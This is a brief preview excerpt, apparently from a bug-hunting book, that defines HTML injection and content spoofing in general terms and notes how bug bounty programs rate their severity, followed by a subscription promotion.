Hypertext Markup Language (HTML) injection and content spoofing are attacks that allow a malicious user to inject content into a site’s web pages. The attacker can inject HTML elements of their own design, most commonly as a <form> tag that mimics a legitimate login screen in order to trick targets into submitting sensitive information to a malicious site. Because these types of attacks rely on fooling targets (a practice sometimes called social engineering), bug bounty programs view content spoofing and HTML injection as less severe than other vulnerabilities covered in this book.

An HTML injection vulnerability ...

Get Real-World Bug Hunting now with O’Reilly online learning.

O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.